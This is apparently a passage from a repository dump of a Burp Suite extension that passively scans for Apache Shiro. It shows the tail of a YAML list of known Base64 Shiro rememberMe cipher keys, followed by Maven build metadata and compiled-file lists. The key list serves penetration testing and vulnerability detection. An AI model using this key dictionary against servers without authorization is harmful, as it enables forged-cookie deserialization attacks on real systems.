249 | - "25BsmdYwjnfcWmnhAciDDg=="
250 | - "3JvYhmBLUs0ETA5Kprsdag=="
251 | - "5AvVhmFLUs0KTA3Kprsdag=="
252 | - "6AvVhmFLUs0KTA3Kprsdag=="
253 | - "6NfXkC7YVCV5DASIrEm1Rg=="
254 | - "cmVtZW1iZXJNZQAAAAAAAA=="
255 | - "8AvVhmFLUs0KTA3Kprsdag=="
256 | - "8BvVhmFLUs0KTA3Kprsdag=="
257 | - "9AvVhmFLUs0KTA3Kprsdag=="
258 | - "OUHYQzxQ/W9e/UjiAGu6rg=="
259 | - "aU1pcmFjbGVpTWlyYWNsZQ=="
260 | - "bXRvbnMAAAAAAAAAAAAAAA=="
261 | - "5J7bIJIV0LQSN3c9LPitBQ=="
262 | - "bya2HkYo57u6fWh5theAWw=="
263 | - "f/SY5TIve5WWzT4aQlABJA=="
264 | - "WuB+y2gcHRnY2Lg9+Aqmqg=="
265 | - "3qDVdLawoIr1xFd6ietnwg=="
266 | - "YI1+nBV//m7ELrIyDHm6DQ=="
267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA=="
268 | - "2A2V+RFLUs+eTA3Kpr+dag=="
269 | - "6ZmI6I2j3Y+R1aSn5BOlAA=="
270 | - "SkZpbmFsQmxhZGUAAAAAAA=="
271 | - "2cVtiE83c4lIrELJwKGJUw=="
272 | - "fsHspZw/92PrS3XrPW+vxw=="
273 | - "XTx6CKLo/SdSgub+OPHSrw=="
274 | - "sHdIjUN6tzhl8xZMG3ULCQ=="
275 | - "O4pdf+7e+mZe8NyxMTPJmQ=="
276 | - "HWrBltGvEZc14h9VpMvZWw=="
277 | - "rPNqM6uKFCyaL10AK51UkQ=="
278 | - "Y1JxNSPXVwMkyvES/kJGeQ=="
279 | - "lT2UvDUmQwewm6mMoiw4Ig=="
280 | - "MPdCMZ9urzEA50JDlDYYDg=="
281 | - "xVmmoltfpb8tTceuT5R7Bw=="
282 | - "c+3hFGPjbgzGdrC+MHgoRQ=="
283 | - "ClLk69oNcA3m+s0jIMIkpg=="
284 | - "Bf7MfkNR0axGGptozrebag=="
285 | - "1tC/xrDYs8ey+sa3emtiYw=="
286 | - "ZmFsYWRvLnh5ei5zaGlybw=="
287 | - "cGhyYWNrY3RmREUhfiMkZA=="
288 | - "IduElDUpDDXE677ZkhhKnQ=="
289 | - "yeAAo1E8BOeAYfBlm4NG9Q=="
290 | - "cGljYXMAAAAAAAAAAAAAAA=="
291 | - "2itfW92XazYRi5ltW0M2yA=="
292 | - "XgGkgqGqYrix9lI6vxcrRw=="
293 | - "ertVhmFLUs0KTA3Kprsdag=="
294 | - "5AvVhmFLUS0ATA4Kprsdag=="
295 | - "s0KTA3mFLUprK4AvVhsdag=="
296 | - "hBlzKg78ajaZuTE0VLzDDg=="
297 | - "9FvVhtFLUs0KnA3Kprsdyg=="
298 | - "d2ViUmVtZW1iZXJNZUtleQ=="
299 | - "yNeUgSzL/CfiWw1GALg6Ag=="
300 | - "NGk/3cQ6F5/UNPRh8LpMIg=="
301 | - "4BvVhmFLUs0KTA3Kprsdag=="
302 | - "MzVeSkYyWTI2OFVLZjRzZg=="
303 | - "CrownKey==a12d/dakdad"
304 | - "empodDEyMwAAAAAAAAAAAA=="
305 | - "A7UzJgh1+EWj5oBFi+mSgw=="
306 | - "c2hpcm9fYmF0aXMzMgAAAA=="
307 | - "i45FVt72K2kLgvFrJtoZRw=="
308 | - "66v1O8keKNV3TTcGPK1wzg=="
309 | - "U3BAbW5nQmxhZGUAAAAAAA=="
310 | - "ZnJlc2h6Y24xMjM0NTY3OA=="
311 | - "Jt3C93kMR9D5e8QzwfsiMw=="
312 | - "MTIzNDU2NzgxMjM0NTY3OA=="
313 | - "vXP33AonIp9bFwGl7aT7rA=="
314 | - "V2hhdCBUaGUgSGVsbAAAAA=="
315 | - "Q01TX0JGTFlLRVlfMjAxOQ=="
316 | - "Is9zJ3pzNh2cgTHB4ua3+Q=="
317 | - "SDKOLKn2J1j/2BHjeZwAoQ=="
318 | - "NsZXjXVklWPZwOfkvk6kUA=="
319 | - "GAevYnznvgNCURavBhCr1w=="
320 | - "zSyK5Kp6PZAAjlT+eeNMlg=="
321 | - "bXdrXl9eNjY2KjA3Z2otPQ=="
322 | - "RVZBTk5JR0hUTFlfV0FPVQ=="
323 | - "WkhBTkdYSUFPSEVJX0NBVA=="
324 | - "GsHaWo4m1eNbE0kNSMULhg=="
325 | - "l8cc6d2xpkT1yFtLIcLHCg=="
326 | - "KU471rVNQ6k7PQL4SqxgJg=="
327 | - "kPH+bIxk5D2deZiIxcabaA=="
328 | - "kPH+bIxk5D2deZiIxcacaA=="
329 | - "4AvVhdsgUs0F563SDFAdag=="
330 | - "FL9HL9Yu5bVUJ0PDU1ySvg=="
331 | - "fdCEiK9YvLC668sS43CJ6A=="
332 | - "FJoQCiz0z5XWz2N2LyxNww=="
333 | - "HeUZ/LvgkO7nsa18ZyVxWQ=="
334 | - "HoTP07fJPKIRLOWoVXmv+Q=="
335 | - "iycgIIyCatQofd0XXxbzEg=="
336 | - "m0/5ZZ9L4jjQXn7MREr/bw=="
337 | - "NoIw91X9GSiCrLCF03ZGZw=="
338 | - "oPH+bIxk5E2enZiIxcqaaA=="
339 | - "QAk0rp8sG0uJC4Ke2baYNA=="
340 | - "Rb5RN+LofDWJlzWAwsXzxg=="
341 | - "s2SE9y32PvLeYo+VGFpcKA=="
342 | - "SrpFBcVD89eTQ2icOD0TMg=="
343 | - "Us0KvVhTeasAm43KFLAeng=="
344 | - "YWJjZGRjYmFhYmNkZGNiYQ=="
345 | - "zIiHplamyXlVB11UXWol8g=="
346 | - "ZjQyMTJiNTJhZGZmYjFjMQ=="
347 | - "2adsfasdqerqerqewradsf=="
348 | - "2AvVCXsxUs0FSA7SYFjdQg=="
349 | - "2AvVhdsgERdsSA3SDFAdag=="
350 | - "2AvVhdsgUs0FSA3SaFAdfg=="
351 | - "2AvVhdsgUs0FSA3SDFAder=="
352 | - "2AvVhdsgUsOFSA3SDFAdag=="
353 | - "2AvVhmFLUs0KTA3Kprsdag=="
354 | - "2AvVidsaUSofSA3SDFAdog=="
355 | - "3Av2hmFLAs0BTA3Kprsd6E=="
356 | - "3AvVhdAgUs1FSA4SDFAdBg=="
357 | - "3AvVhMFLIs0KTA3Kprsdag=="
358 | - "3AvVhmFLUs0KTA3KaTHGFg=="
359 | - "3qDVdLawoIr1xFd6ietnsg=="
360 | - "3rvVhmFLUs0KAT3Kprsdag=="
361 | - "4AvVhm2LUs0KTA3Kprsdag=="
362 | - "4AvVhmFLUs0KTA3KAAAAAA=="
363 | - "4AvVhmFLUs0KTA3Kprseaf=="
364 | - "4AvVhmFLUs0TTA3Kprsdag=="
365 | - "4AvVhmFLUs5KTA1Kprsdag=="
366 | - "4AvVhmFLUsOKTA3Kprsdag=="
367 | - "4rvVhmFLUs0KAT3Kprsdag=="
368 | - "4WCZSJyqdUQsije93aQIRg=="
369 | - "5AvVhCsgUs0FSA3SDFAdag=="
370 | - "5oiR5piv5p2h5ZK46bG8IQ=="
371 | - "8AvVhdsgUs0FSA3SDFAdag=="
372 | - "9Ami6v2G5Y+r5aPnE4OlBB=="
373 | - "9AVvhnFLuS3KTV8KprsdAg=="
374 | - "AF05JAuyuEB1ouJQ9Y9Phg=="
375 | - "aG91c2Vob3VzZWhvdXNlMg=="
376 | - "A+kWR7o9O0/G/W6aOGesRA=="
377 | - "AztiX2RUqhc7dhOzl1Mj8Q=="
378 | - "b2EAAAAAAAAAAAAAAAAAAA=="
379 | - "B9rPF8FHhxKJZ9k63ik7kQ=="
380 | - "c2hvdWtlLXBsdXMuMjAxNg=="
381 | - "Cj6LnKZNLEowAZrdqyH/Ew=="
382 | - "duhfin37x6chw29jsne45m=="
383 | - "fCq+/xW488hMTCE+cmJ3FF=="
384 | - "FjbNm1avvGmWE9CY2HqV75=="
385 | - "GhrF5zLfq1Dtadd1jlohhA=="
386 | - "GHxH6G3LFh8Zb3NwoRgfFA=="
387 | - "HOlg7NHb9potm0n5s4ic0Q=="
388 | - "lt181dcQVz/Bo9Wb8ws/Cg=="
389 | - "M2djA70UBBUPDibGZBRvrA=="
390 | - "mIccZhQt6EBHrZIyw1FAXQ=="
391 | - "pbnA+Qzen1vjV3rNqQBLHg=="
392 | - "pyyX1c5x2f0LZZ7VKZXjKO=="
393 | - "QDFCnfkLUs0KTA3Kprsdag=="
394 | - "QF5HMyZAWDZYRyFnSGhTdQ=="
395 | - "qQFtSnnj/sx7vu51ixAyEQ=="
396 | - "QUxQSEFNWVNPRlRCVUlMRA=="
397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ=="
398 | - "R29yZG9uV2ViAAAAAAAAAA=="
399 | - "sBv2t3okbdm3U0r2EVcSzB=="
400 | - "sgIQrqUVxa1OZRRIK3hLZw=="
401 | - "TGMPe7lGO/Gbr38QiJu1/w=="
402 | - "w793pPq5ZVBKkj8OhV4KaQ=="
403 | - "wrjUh2ttBPQLnT4JVhriug=="
404 | - "wyLZMDifwq3sW1vhhHpgKA=="
405 | - "YnlhdnMAAAAAAAAAAAAAAA=="
406 | - "YVd4dmRtVjViM1UlM0QIdn=="
407 | - "YWdlbnRAZG1AMjAxOHN3Zg=="
408 | - "YystomRZLMUjiK0Q1+LFdw=="
409 | - "Z3VucwAAAAAAAAAAAAABBB=="
410 | - "Z3VucwACAOVAKALACAADSA=="
--------------------------------------------------------------------------------
/target/maven-archiver/pom.properties:
--------------------------------------------------------------------------------
1 | #Generated by Maven
2 | #Fri Sep 02 21:48:36 CST 2022
3 | groupId=com.github.pmiaowu
4 | artifactId=BurpShiroPassiveScan
5 | version=2.0.0
6 |
--------------------------------------------------------------------------------
/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | burp\Application\ShiroCipherKeyExtension\ExtensionInterface\AShiroCipherKeyExtension.class
2 | burp\Ui\Tags.class
3 | burp\Encrypt.class
4 | burp\Bootstrap\Encrypt\GcmEncrypt.class
5 | burp\Application\ShiroCipherKeyExtension\ShiroCipherKey.class
6 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint2.class
7 | burp\Menu$2.class
8 | burp\CustomErrorException\TaskTimeoutException.class
9 | burp\Menu$7.class
10 | burp\Utils$SilentURLStreamHandler.class
11 | burp\Bootstrap\CustomBurpUrl.class
12 | burp\CustomScanIssue.class
13 | burp\Menu$4.class
14 | burp\Bootstrap\DiffPage.class
15 | burp\Bootstrap\YamlReader.class
16 | burp\Application\ShiroCipherKeyExtension\ShiroCipherKeyThread.class
17 | burp\Bootstrap\Encrypt\CbcEncrypt.class
18 | burp\ConfigDlg.class
19 | burp\Ui\ScanQueueTag$TablesData.class
20 | burp\Menu$1.class
21 | burp\Menu$6.class
22 | burp\Bootstrap\GlobalVariableReader.class
23 | burp\BurpExtender.class
24 | burp\Menu.class
25 | burp\Bootstrap\Encrypt\EncryptInterface.class
26 | burp\Application\ShiroFingerprintExtension\ExtensionInterface\IShiroFingerprintExtension.class
27 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint1.class
28 | burp\Application\ShiroCipherKeyExtension\ExtensionInterface\IShiroCipherKeyExtension.class
29 | burp\Application\ShiroFingerprintExtension\ExtensionInterface\AShiroFingerprintExtension.class
30 | burp\ConfigDlg$1.class
31 | burp\Application\ShiroFingerprintExtension\ShiroFingerprint.class
32 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint3.class
33 | burp\Bootstrap\CustomBurpHelpers.class
34 | burp\Menu$3.class
35 | burp\Ui\ScanQueueTag$URLTable.class
36 | burp\Ui\ScanQueueTag.class
37 | burp\Utils.class
38 | burp\Bootstrap\GlobalPassiveScanVariableReader.class
39 | burp\Application\ShiroCipherKeyExtension\ExtensionMethod\ShiroCipherKeyScan.class
40 | burp\Config.class
41 | burp\Bootstrap\CustomHelpers.class
42 | burp\CustomErrorException\DiffPageException.class
43 | burp\Menu$5.class
44 | burp\Ui\BaseSettingTag.class
45 |
--------------------------------------------------------------------------------
/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomScanIssue.java
2 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomErrorException\DiffPageException.java
3 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionInterface\AShiroCipherKeyExtension.java
4 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\EncryptInterface.java
5 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionInterface\IShiroFingerprintExtension.java
6 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ShiroCipherKey.java
7 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ShiroFingerprint.java
8 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint3.java
9 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\DiffPage.java
10 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomHelpers.java
11 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Utils.java
12 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomBurpHelpers.java
13 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\GlobalPassiveScanVariableReader.java
14 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Menu.java
15 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\BaseSettingTag.java
16 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ShiroCipherKeyThread.java
17 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint1.java
18 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\BurpExtender.java
19 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\Tags.java
20 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\CbcEncrypt.java
21 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionMethod\ShiroCipherKeyScan.java
22 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Encrypt.java
23 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Config.java
24 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\ScanQueueTag.java
25 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint2.java
26 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\ConfigDlg.java
27 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\GcmEncrypt.java
28 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\YamlReader.java
29 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\GlobalVariableReader.java
30 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionInterface\AShiroFingerprintExtension.java
31 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionInterface\IShiroCipherKeyExtension.java
32 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomBurpUrl.java
33 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomErrorException\TaskTimeoutException.java
34 |
--------------------------------------------------------------------------------